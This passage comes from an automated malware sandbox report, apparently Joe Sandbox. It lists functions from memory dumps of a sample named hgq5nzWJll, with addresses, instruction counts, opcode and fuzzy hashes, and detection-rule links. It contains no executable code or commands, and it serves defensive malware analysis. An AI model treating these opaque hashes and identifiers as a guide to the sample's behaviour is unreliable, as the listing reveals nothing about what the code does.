                                                  • Source File: 00000000.00000002.1401298416.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71c0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  • Opcode ID: f0e7ca3868633e4dc4e865ae56e36c60b28e245f8e46e210d31d8a5ed533d557
                                                  • Instruction ID: 6130df05fdf1fe022612e7695b698cb8d35d5f933a3a68d31a1699d0c3b0f4f6
                                                  • Opcode Fuzzy Hash: f0e7ca3868633e4dc4e865ae56e36c60b28e245f8e46e210d31d8a5ed533d557
                                                  • Instruction Fuzzy Hash: 7F11E5B5800359DFDB10DF9AD945BDEFBF8EB48320F248419D519A7250C375A544CFA1
                                                  Function 0528C210 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (kq
                                                  • API String ID: 0-3643127487
                                                  • Opcode ID: bf85500316c990ca2e7aca3349ff7898738071e50faba1f66b80825695439ade
                                                  • Instruction ID: aff543ab4104c6bcaf99461a157486e9909d946001dd728487cd0034f3e9a1b1
                                                  • Opcode Fuzzy Hash: bf85500316c990ca2e7aca3349ff7898738071e50faba1f66b80825695439ade
                                                  • Instruction Fuzzy Hash: 3541D4317256214FDB19BBB8942463E3BE7AFC8660B1444A9D40AEF3C4DF24DC0287E5
                                                  Function 05283064 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hkq
                                                  • API String ID: 0-3520182757
                                                  • Opcode ID: 3a3d234f51669f7e52ae7404a44fb23d83fb055ff95ddce6de832b80faf0c60d
                                                  • Instruction ID: f0f59565a20366fa9a1d60c365af217d9c47c55242f83c922f117814a689e974
                                                  • Opcode Fuzzy Hash: 3a3d234f51669f7e52ae7404a44fb23d83fb055ff95ddce6de832b80faf0c60d
                                                  • Instruction Fuzzy Hash: AC418275A002089FCB14DFA9D444AAEBBF9FF88310F14855DE409AB350CB75A841CBA1
                                                  Function 05289C90 Relevance: .7, Instructions: 729COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 012a6d3016f86f7cc44ec6580d8dc900a79dbe61e579cebecbb59c19318a5e76
                                                  • Instruction ID: 9333ed055e500bcb568e74381832371a5792f7f70eff1f4835ca6ea62b7d7fed
                                                  • Opcode Fuzzy Hash: 012a6d3016f86f7cc44ec6580d8dc900a79dbe61e579cebecbb59c19318a5e76
                                                  • Instruction Fuzzy Hash: 44722B31D11609CFDB14EF68C894AEDB7B1FF45304F008699D54AAB265EF30AAD5CB80
                                                  Function 05286C10 Relevance: .6, Instructions: 551COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa51350357c661d45026ee8587c3664c1001b3b35a992505a87af199ea9f06c9
                                                  • Instruction ID: adc78a77c8077a532972ce0e8d1aa115bfc0458e9372c1fac330ab26af9fa043
                                                  • Opcode Fuzzy Hash: fa51350357c661d45026ee8587c3664c1001b3b35a992505a87af199ea9f06c9
                                                  • Instruction Fuzzy Hash: C242FA30E1161ACBCB14EFA8C894AEDF7B1FF59304F148699D459BB251EB70A985CF40
                                                  Function 0528B928 Relevance: .5, Instructions: 500COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ddc02e1195be87d1c69b16dd999c875374bbce1b3ac18502e5c91419cfc2b90f
                                                  • Instruction ID: 9dbea0c2e96ede18834ce50adbf9cf806a6b8b41a1396e884180498418d3c777
                                                  • Opcode Fuzzy Hash: ddc02e1195be87d1c69b16dd999c875374bbce1b3ac18502e5c91419cfc2b90f
                                                  • Instruction Fuzzy Hash: A5223C34A11205CFDB14EF69C894BADB7B2FF89304F1485A9E50AAB3A1DB70AD45CF50
                                                  Function 05286C00 Relevance: .3, Instructions: 334COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6ae5eff23898af9477bc15ce3063704c5c8464fdfd9bc60f0df0548b723ec60
                                                  • Instruction ID: 6956daa9d7533345f8bf5bd45b081799efdf28ca2cc4632e2fdc448173705a72
                                                  • Opcode Fuzzy Hash: d6ae5eff23898af9477bc15ce3063704c5c8464fdfd9bc60f0df0548b723ec60
                                                  • Instruction Fuzzy Hash: B1E1FB31E116198FCB24EFA8C894AEDF7B2FF59304F148699D419AB251EB70AD85CF40
                                                  Function 0528B560 Relevance: .3, Instructions: 268COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 93a17265e0f2eab2b63b5bb7ec5ba643ff2e102efb0fd6fcdfc61aba66df83ef
                                                  • Instruction ID: 66e42895a97953de37e89b0f5d769c3d8af40ed4c945fd79eaf76c220219106e
                                                  • Opcode Fuzzy Hash: 93a17265e0f2eab2b63b5bb7ec5ba643ff2e102efb0fd6fcdfc61aba66df83ef
                                                  • Instruction Fuzzy Hash: 65C10B34E11619CFCB14EFA8C884AADB7B1FF89304F1585A9D449AB361EB30A985CF40
                                                  Function 0528B551 Relevance: .2, Instructions: 211COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8c01bc29d5d17689d3027cfb858cf9ce4faf359f8e18b9f0186059a9a7a73e2
                                                  • Instruction ID: 775552385f7b2def2d43bb5921ce41784d65cf4e72a7d19fd57a2183c723ed7f
                                                  • Opcode Fuzzy Hash: a8c01bc29d5d17689d3027cfb858cf9ce4faf359f8e18b9f0186059a9a7a73e2
                                                  • Instruction Fuzzy Hash: 82A1E735E1161ACFCB14DF68C884AADF7B1FF89304F1586A9D449AB261EB70AD85CF40
                                                  Function 05289620 Relevance: .2, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8dbe13e9f525a32e20e3e78c914ffdc04c44991b34495f2f6e80c70f77d96648
                                                  • Instruction ID: 5b37077693a9f63662695302b30eaec6c348fee51bef577e25ed40621e7646f2
                                                  • Opcode Fuzzy Hash: 8dbe13e9f525a32e20e3e78c914ffdc04c44991b34495f2f6e80c70f77d96648
                                                  • Instruction Fuzzy Hash: F391FC7591060ADFCB01DFA8C8809A9FBF5FF49310B14875AE819EB255E730E985CF80
                                                  Function 052889B0 Relevance: .2, Instructions: 176COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee278c64bcf92e747313269920adbc1b66e257fc966b24d20863efb5bbb52fbd
                                                  • Instruction ID: 1ade85932ed3377a34ae47734bf1f556c881f7ae39a7fe6a5c44dd9695c21b99
                                                  • Opcode Fuzzy Hash: ee278c64bcf92e747313269920adbc1b66e257fc966b24d20863efb5bbb52fbd
                                                  • Instruction Fuzzy Hash: 8171CDB9300A008FC718DF29C588959BBF2FF8931471589A9E54ACB372DB71EC41CB50
                                                  Function 0528C010 Relevance: .2, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b1f0d5bce6cc255a97d331b73fc8872fdc16e0ca924832cc44f58017ac20f85
                                                  • Instruction ID: d232cfef0cc6703dad12fd5a1ea9aa3108db1becf8c33d2eca4b819601102873
                                                  • Opcode Fuzzy Hash: 5b1f0d5bce6cc255a97d331b73fc8872fdc16e0ca924832cc44f58017ac20f85
                                                  • Instruction Fuzzy Hash: 29514E347112158FDB14EF69D894AAE77F6BF89750B1444A9E406EB3A0DB35EC01CF60
                                                  Function 052887C0 Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7939a43834315ffde4f45144892b28d08aa528f0227d857a841b9d027834cd41
                                                  • Instruction ID: 5b14b08ab42e06c599815b70e7d5e96bb5c9499c99279270df14bf9504244587
                                                  • Opcode Fuzzy Hash: 7939a43834315ffde4f45144892b28d08aa528f0227d857a841b9d027834cd41
                                                  • Instruction Fuzzy Hash: 4571B374A152068FC704DFA9D5849A9FBF1FF48314B49C6A9E80ADB752D730E885CF90
                                                  Function 052889A0 Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6378a27ed4ce5e576f8bb63af8c32b07d0800a3df82c22766aca95c4d01d9a4c
                                                  • Instruction ID: 407c931b7fb254120c90ca6f95f11eff11121a6dc41e940088a13a281d4cf2bd
                                                  • Opcode Fuzzy Hash: 6378a27ed4ce5e576f8bb63af8c32b07d0800a3df82c22766aca95c4d01d9a4c
                                                  • Instruction Fuzzy Hash: 4771D079600A00CFC718DF29C488A59BBF2FF89314B1589A9E54ACB772DB71EC41CB50
                                                  Function 0528B918 Relevance: .2, Instructions: 164COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e98cb536bfe2af5613a72bde6635058284ad6ce66107e5758d1a4cb2687eb608
                                                  • Instruction ID: 104a5e4497be031782cfbc42c7068aa0779a5eda17799dd9fb6f1beac0756270
                                                  • Opcode Fuzzy Hash: e98cb536bfe2af5613a72bde6635058284ad6ce66107e5758d1a4cb2687eb608
                                                  • Instruction Fuzzy Hash: 08512830620601CFDB14EF79C898BAD77B2BF89310F1486BCE51A9B3A1DB71A845CB51
                                                  Function 0528F6F0 Relevance: .2, Instructions: 163COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2e78a6c5326c790fa5c0f1fc97a82d4f6fe6e4fc692f60a3980ad73889acbd1f
                                                  • Instruction ID: ce120622ce55bf7b32f5851c551d024c0e02e999beb0625d33df80a9dabc898e
                                                  • Opcode Fuzzy Hash: 2e78a6c5326c790fa5c0f1fc97a82d4f6fe6e4fc692f60a3980ad73889acbd1f
                                                  • Instruction Fuzzy Hash: 3D618134A10609DFDF10EFA8D8999ADBBB5FF88300F10851DE406AB354EB309995CF81
                                                  Function 0528F700 Relevance: .2, Instructions: 160COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fa9e30bd061fbca8b7b7b850366f3d39dd628a74a3a94ea6f08db8fdbfb960b6
                                                  • Instruction ID: 0ac5a87623bb043519250f9e161631f1a5be2b110506cdb3a360678240c708b1
                                                  • Opcode Fuzzy Hash: fa9e30bd061fbca8b7b7b850366f3d39dd628a74a3a94ea6f08db8fdbfb960b6
                                                  • Instruction Fuzzy Hash: FE616F34A10609DFDF10EFA8D8599AEFBB5FF88300F10852DE406AB354EB70A955CB81
                                                  Function 052826A8 Relevance: .2, Instructions: 155COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7fefa6db959b2dde6736c3bd32cd64a2f6bacc7504446607e3716263f52ace86
                                                  • Instruction ID: c301e045dbad0418c14a72b1104a1babf94d9de4ed65cbd84387559485b0408c
                                                  • Opcode Fuzzy Hash: 7fefa6db959b2dde6736c3bd32cd64a2f6bacc7504446607e3716263f52ace86
                                                  • Instruction Fuzzy Hash: 1D516275E102499FCB14EFA9D848ABFBFF9EF88310F14841AE455E7290DB7499018BA0
                                                  Function 05289610 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db63f3a7f42b933a82099eae6f52fc88c242fe6095d5ee53dbaee0ee66e76577
                                                  • Instruction ID: 237914f41477e8cf04c5ffaf9466f943d5512938949b166cd13ac6936cef1d85
                                                  • Opcode Fuzzy Hash: db63f3a7f42b933a82099eae6f52fc88c242fe6095d5ee53dbaee0ee66e76577
                                                  • Instruction Fuzzy Hash: EF510D7191070ACFCB51EF68C8809A9FBB5FF49310B14875AE859EB255EB70E9C5CB80
                                                  Function 0528ACA8 Relevance: .1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f65fdec0089bd974da14d4cc8703b872d6c2fdd6d89df9d9c4cc8bfea692144f
                                                  • Instruction ID: 465216457d001df65834ba051e0ac6301fac8d846ac73df787c0b280d28245d8
                                                  • Opcode Fuzzy Hash: f65fdec0089bd974da14d4cc8703b872d6c2fdd6d89df9d9c4cc8bfea692144f
                                                  • Instruction Fuzzy Hash: 18517875921219DFCB04DF94D544AEDBBB1FF48320F15815AE806BB294DB70AA95CF80
                                                  Function 0528309C Relevance: .1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f07d81e7574e30616de4b3b8102c7efec8735b89e1916e9757ae311c0bb0989b
                                                  • Instruction ID: e50419f001de42e3eee094badab414ce75e2fc69e49a386af431a77f2fbf7f59
                                                  • Opcode Fuzzy Hash: f07d81e7574e30616de4b3b8102c7efec8735b89e1916e9757ae311c0bb0989b
                                                  • Instruction Fuzzy Hash: DE31CF30A22219DFCF14EFA0E5889ADFBB2FF84305F1185AAE45267695CB309C55CB90
                                                  Function 073F0FB0 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1401664947.00000000073F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73f0000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce2d74a026c1b615930bae67e7ca3078685915e5d9d755b0c2b222cad660a750
                                                  • Instruction ID: 3de85078f066ebc238e1b7e88b85453bde023d2c3ac2f7064a12403f79ec79ce
                                                  • Opcode Fuzzy Hash: ce2d74a026c1b615930bae67e7ca3078685915e5d9d755b0c2b222cad660a750
                                                  • Instruction Fuzzy Hash: 6E319DB5300741CFE719DB3AD880B5A7BA6EF8A254F1484A9E20DCF352DA35D805CB62
                                                  Function 05287899 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fce2912a8c759159df08b953be7e2ec714a1186811e04e54e5f3e82b181dc4da
                                                  • Instruction ID: 2f68f796630b2120c29648ebd2994366a948690f021484953181c57791c4a5cd
                                                  • Opcode Fuzzy Hash: fce2912a8c759159df08b953be7e2ec714a1186811e04e54e5f3e82b181dc4da
                                                  • Instruction Fuzzy Hash: 62413234A10709CFCB04EF78C894ADDBBB6FF89304F108559E515AB365EB71A946CB81
                                                  Function 052878A8 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 686f8e886b7a69c148b7717b0b283bacc303f317a9c28fad3274bb5e9e42d3bb
                                                  • Instruction ID: d59174dbb68dbf2889eab72625f9c4db91480b354479f27f6129cefc7e69c372
                                                  • Opcode Fuzzy Hash: 686f8e886b7a69c148b7717b0b283bacc303f317a9c28fad3274bb5e9e42d3bb
                                                  • Instruction Fuzzy Hash: 6D412F34A10709CFCB04EFB8C8949DDBBB6FF89304F108559E515AB365EB71A945CB81
                                                  Function 0528376C Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d29ad878bcf673d065296be0a440ffc4392d4f2105036c562388087e151051b
                                                  • Instruction ID: 1820e0906495e16b7c40a62c262f6a8403e5f5d9a6a2bc68f4d6abc9d2df2304
                                                  • Opcode Fuzzy Hash: 3d29ad878bcf673d065296be0a440ffc4392d4f2105036c562388087e151051b
                                                  • Instruction Fuzzy Hash: CD4101B0D11209CBDB20DFEAC984A9DFBB5FF48304F248529D408BB244D7B56A89CF90
                                                  Function 052826E4 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5cb3c3ba852dbb5cb50ee73d551419dd1f8fbb1b279ccffaaa890c983f52737
                                                  • Instruction ID: 53fd544535f2b214898eca6c6f508f00b46ea370fd804dd41a7f6ec4abc8d10d
                                                  • Opcode Fuzzy Hash: e5cb3c3ba852dbb5cb50ee73d551419dd1f8fbb1b279ccffaaa890c983f52737
                                                  • Instruction Fuzzy Hash: 3941E1B0D11209DBDB20DFEAC984A9DFBB5BF58704F248529D408BB244D7B56A89CF90
                                                  Function 05283310 Relevance: .1, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca8045935e0250195cb1d8ee50e0b15aa7b8ea1ed73c88f706ce06d43fffad5a
                                                  • Instruction ID: 59f455cb28d04049bbe0510aac0891d7b426366cd4586ae5aa7e552bf2033398
                                                  • Opcode Fuzzy Hash: ca8045935e0250195cb1d8ee50e0b15aa7b8ea1ed73c88f706ce06d43fffad5a
                                                  • Instruction Fuzzy Hash: 0E31DB75E112199FDF05EFE9C9509FEBBFAEF88210F144465D809E7244EB309A018BA1
                                                  Function 052887AF Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: abbcf8ef2ad76a464f7f5fdd2888a9e7ef33e614ac173c0469b9f1c7ff33e5b0
                                                  • Instruction ID: ad4b9b5b24a1dab6015e031cca7b3764a9fc0f2d46549b3059fd4c49f3a5d514
                                                  • Opcode Fuzzy Hash: abbcf8ef2ad76a464f7f5fdd2888a9e7ef33e614ac173c0469b9f1c7ff33e5b0
                                                  • Instruction Fuzzy Hash: 324128B4A112068FC714DFA8D584AA9FBF1FF49300F498AA9D84ADB351D730EC45CB90
                                                  Function 05285617 Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d85b02efe164c66369d9d2010e478e6ad30eb363e6b4f33c2c48afb9b45d027b
                                                  • Instruction ID: fe54f67ab397e7ce641290a9e4a20e16668a4628710b13646e232930a6f34a0c
                                                  • Opcode Fuzzy Hash: d85b02efe164c66369d9d2010e478e6ad30eb363e6b4f33c2c48afb9b45d027b
                                                  • Instruction Fuzzy Hash: EE41F775A0120ADFCB40DFA8D5849AAFBB5FF49314B14C699E918EB311E730E985CF90
                                                  Function 0528269C Relevance: .1, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 911ee3fe26661248206b604a4495980884fb2c4e3d21c123610188be5a47c03d
                                                  • Instruction ID: b77d232c5d14ea70aa5e0b912a949387e2c88ecbb36ede1f4330ea16dcf5441e
                                                  • Opcode Fuzzy Hash: 911ee3fe26661248206b604a4495980884fb2c4e3d21c123610188be5a47c03d
                                                  • Instruction Fuzzy Hash: 5B41DFB0D11358DFDB14CF9AC884A9EFBB1BF88710F20862AE419AB254D7B46845CF90
                                                  Function 052877A0 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba6e5360bd2a1aec26d0d4f3513cabf0ad55882c0d1fe0fa35a564df6a996ec5
                                                  • Instruction ID: 7f2d467a34319e8bdd21c95915d679f0dbc5bb730b96d048d69c540e887f68f8
                                                  • Opcode Fuzzy Hash: ba6e5360bd2a1aec26d0d4f3513cabf0ad55882c0d1fe0fa35a564df6a996ec5
                                                  • Instruction Fuzzy Hash: 3D31AB31B1121A9FCF04EBA4D8548EDF7B6FF89214B048669E906AB351EB71AC41CBC0
                                                  Function 05285628 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1399188842.0000000005280000.00000040.00000800.00020000.00000000.sdmp, Offset: 05280000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5280000_hgq5nzWJll.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc56c67a8ea976ee0265c8332ab2721b28337b2ac1266290f49314f5b6d71e90
                                                  • Instruction ID: 92c9b8643e001f780ec8c85987e1c81355e167a5080392821194c1e437242a0d
                                                  • Opcode Fuzzy Hash: bc56c67a8ea976ee0265c8332ab2721b28337b2ac1266290f49314f5b6d71e90
                                                  • Instruction Fuzzy Hash: 35410675A0120ADFCB40DFA9D88499EFBB5FF48314B14C659E918AB311E730E985CF90
                                                  Function 05286208 Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
